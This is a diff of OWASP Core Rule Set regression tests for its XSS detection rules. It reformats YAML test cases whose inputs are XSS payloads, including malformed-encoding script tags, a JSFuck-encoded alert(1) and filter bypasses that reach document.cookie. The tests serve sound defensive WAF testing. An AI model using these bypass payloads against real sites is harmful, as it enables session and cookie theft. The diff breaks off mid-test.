"OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbc\xbc - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbc\xbc + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 7 desc: Negative test for closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbe\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbe\xbe + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 8 desc: Negative for missing end tag, opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0 + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 9 desc: Negative for missing end tag, closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0/script\xd0\xbe + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 10 desc: Negative using real world Russian example in utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнпрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 11 desc: Negative using real world Russian example in utf-8, variant stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" - data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + no_log_contains: id "941310" + - test_id: 12 desc: "Status Page Test - US-ASCII Malformed Encoding XSS Filter Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: test=\xbctest\xbetest(\xa2XSS\xa2)\xbc/test\xbe + version: "HTTP/1.1" + output: + log_contains: id "941310" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml index ee155e7f6..3c7a1ca8a 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml @@ -2,23 +2,20 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941320.yaml tests: - - test_title: 941320-1 + - test_id: 1 desc: "XSS Attack - HTML Tag Handler" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\">" - output: - log_contains: id "941330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log_contains: id "941330" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml index 214a6fed4..d44fff9fb 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml @@ -2,40 +2,36 @@ meta: author: "Christian S.J. Peron, azurit" description: None - enabled: true - name: 941340.yaml tests: - - test_title: 941340-1 + - test_id: 1 desc: "IE XSS Filters - Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' infoo.bar=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941340" - - test_title: 941340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' infoo.bar=&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "941340" + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=XSS" - version: HTTP/1.0 - output: - log_contains: id "941340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=XSS" + version: HTTP/1.0 + output: + log_contains: id "941340" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml index 11cd1675f..703485f18 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml @@ -1,23 +1,21 @@ --- meta: author: "fgsch, azurit" - enabled: true - name: 941350.yaml description: Test rule 941350 +rule_id: 941350 tests: - - test_title: 941350-1 + - test_id: 1 desc: GH issue 1514 stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/xx?id=%252bADw-script%252bAD4-" - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - version: "HTTP/1.1" - output: - log_contains: id "941350" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/xx?id=%252bADw-script%252bAD4-" + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + version: "HTTP/1.1" + output: + log_contains: id "941350" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml index 218cf00ad..0064de5d2 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml @@ -2,60 +2,55 @@ meta: author: "Christian Folini, azurit" description: None - enabled: true - name: 941360.yaml tests: - - test_title: 941360-1 + - test_id: 1 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" - # Payload represents "alert(1)" in JSFuck encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 941360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()" + # Payload represents "alert(1)" in JSFuck encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_id: 2 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=(![]+[])[+!+[]]" - # Payload represents "a" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" - - test_title: 941360-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=(![]+[])[+!+[]]" + # Payload represents "a" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" + - test_id: 3 desc: "JSFuck / Hieroglyphy payload obfuscation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=+!![]" - # Payload represents "1" in JSFuck / Hieroglyphy encoding - version: HTTP/1.1 - output: - log_contains: id "941360" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=+!![]" + # Payload represents "1" in JSFuck / Hieroglyphy encoding + version: HTTP/1.1 + output: + log_contains: id "941360" diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml index 405779515..775109d42 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml @@ -2,176 +2,164 @@ meta: author: "Andrea Menin, azurit" description: None - enabled: true - name: 941370.yaml tests: - - test_title: 941370-1 + - test_id: 1 desc: "Bypass using comment in syntax and multiple whitespaces" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document+%2F%2Afoo%2A%2F+.+++++cookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 2 desc: "Bypass using comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=document%2F%2Afoo%2A%2F.%2F%2Abar%2A%2Fcookie" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 3 desc: "Bypass using JavaScript global variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=window%5B%22alert%22%5D%28window%5B%22document%22%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 4 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 5 desc: "Bypass using JavaScript global variables and string concatenation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%2F%2Afoo%2A%2F%22alert%22%5D%28self%5B%22document%22%2F%2Abar%2A%2F%5D%5B%22cookie%22%5D%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 6 desc: "Bypass using JavaScript global variables and comments in syntax" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self++%2F%2Ajhb%2A%2F++%5B++%2F%2Abar%2A%2F++%22alert%22%5D%28%22xss%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 7 desc: "Bypass using JavaScript global variables and jQuery globalEval" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%24%22%5D%5B%22globalEval%22%5D%28%22alert%281%29%22%29" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 8 desc: "Bypass using JavaScript global variables and hex escape sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=self%5B%22%5Cx24%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=self%5B%22%5Cx24%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 9 desc: "Bypass trying to access document.cookie using alternative syntax like (document)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "a=%28document%29%5B%22cookie%22%5D" - version: HTTP/1.1 - output: - log_contains: id "941370" - - test_title: 941370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "a=%28document%29%5B%22cookie%22%5D" + version: HTTP/1.1 + output: + log_contains: id "941370" + - test_id: 10 desc: "Bypass trying to access document.cookie using alternative syntax and comments like (document/*foo*/)['cookie']" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 